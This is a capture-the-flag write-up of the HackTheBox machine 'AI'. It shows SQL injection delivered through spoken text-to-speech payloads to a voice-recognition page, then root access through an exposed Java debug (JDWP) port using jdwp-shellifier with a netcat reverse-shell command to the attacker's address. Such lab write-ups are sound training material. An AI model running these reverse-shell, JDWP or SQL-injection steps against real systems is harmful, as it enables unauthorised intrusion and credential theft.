AI - HackTheBox

AI is a machine from Hack The Box with an exploitation method that I’ve never seen before.

Let’s start with the usual nmap scan:

$ nmap -A -T4 10.10.10.163
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-25 14:57 EST
Nmap scan report for 10.10.10.163
Host is up (0.059s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6d:16:f4:32:eb:46:ca:37:04:d2:a5:aa:74:ed:ab:fc (RSA)
|   256 78:29:78:d9:f5:43:d1:cf:a0:03:55:b1:da:9e:51:b6 (ECDSA)
|_  256 85:2e:7d:66:30:a6:6e:30:04:82:c1:ae:ba:a4:99:bd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Hello AI!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

While visiting the website, the only thing that might be interesting is in ai.php:

After uploading a random wav file found on the internet, we get this output:

It looks like there’s an online service that does voice recognition and uses its output to perform a query, and given that in our text there are single quotes (for example in the verb wouldn’t), a SQL error has been triggered.

Also, running a web discovery tool allows us to find intelligence.php:

$ gobuster dir -q -r -w lists/raft-small-words-lowercase.txt -x php,html -s 200 -u http://10.10.10.163
/index.php (Status: 200)
/contact.php (Status: 200)
/db.php (Status: 200)
/about.php (Status: 200)
/. (Status: 200)
/ai.php (Status: 200)
/intelligence.php (Status: 200)

Here is the page:

We can try to exploit this by recording an audio ourself or using text to speech services. I will use text2speech with these options:

Following the guide and after many, many attempts, I’ve come up with the following payload:

open single quote space union select space username from users comment database

And the result is:

And this payload:

open single quote space union select password from users comment database

gives us the password:

Let’s try to connect with SSH:

alexa@AI:~$ wc -c user.txt
33 user.txt

And there’s the user flag!

Privilege escalation

Running the usual recon commands, we can see with ps aux an interesting process running as root:

root     128367 21.1  4.7 3108796 95460 ?       Sl   16:06   0:03 /usr/bin/java
-Djava.util.logging.config.file=/opt/apache-tomcat-9.0.27/conf/logging.properties
-Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager
-Djdk.tls.ephemeralDHKeySize=2048
-Djava.protocol.handler.pkgs=org.apache.catalina.webresources
-Dorg.apache.catalina.security.SecurityListener.UMASK=0027
-agentlib:jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n
-Dignore.endorsed.dirs= -classpath
/opt/apache-tomcat-9.0.27/bin/bootstrap.jar:/opt/apache-tomcat-9.0.27/bin/tomcat-juli.jar
-Dcatalina.base=/opt/apache-tomcat-9.0.27
-Dcatalina.home=/opt/apache-tomcat-9.0.27
-Djava.io.tmpdir=/opt/apache-tomcat-9.0.27/temp
org.apache.catalina.startup.Bootstrap start

A quick google search gives us this exploit that allows arbitrary code execution. After downloading it on our machine, we have to forward the port 8000 on the remote machine to our machine, because the service is running on localhost so we cannot reach it from outside. Let’s do so with ssh -L 8000:localhost:8000 alexa@10.10.10.163. Let’s start a netcat listener and run the exploit:

$ ./jdwp-shellifier.py -t localhost -p 8000 --cmd 'busybox nc 10.10.14.81 1337 -e /bin/bash'
[+] Targeting 'localhost:8000'
[+] Reading settings for 'OpenJDK 64-Bit Server VM - 11.0.4'
[+] Found Runtime class: id=b8f
[+] Found Runtime.getRuntime(): id=7ff73403e880
[+] Created break event id=2
[+] Waiting for an event on 'java.net.ServerSocket.accept'
[+] Received matching event from thread 0x1
[+] Selected payload 'busybox nc 10.10.14.81 1337 -e /bin/bash'
[+] Command string object created id:c34
[+] Runtime.getRuntime() returned context id:0xc35
[+] found Runtime.exec(): id=7ff73403e8b8
[+] Runtime.exec() successful, retId=c36
[!] Command successfully executed

And we got a shell as root! Let’s get the flag:

$ nc -lnvp 1337
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.163.
Ncat: Connection from 10.10.10.163:45658.
whoami
root
wc -c /root/root.txt
33 /root/root.txt

Quick and easy, thanks for reading!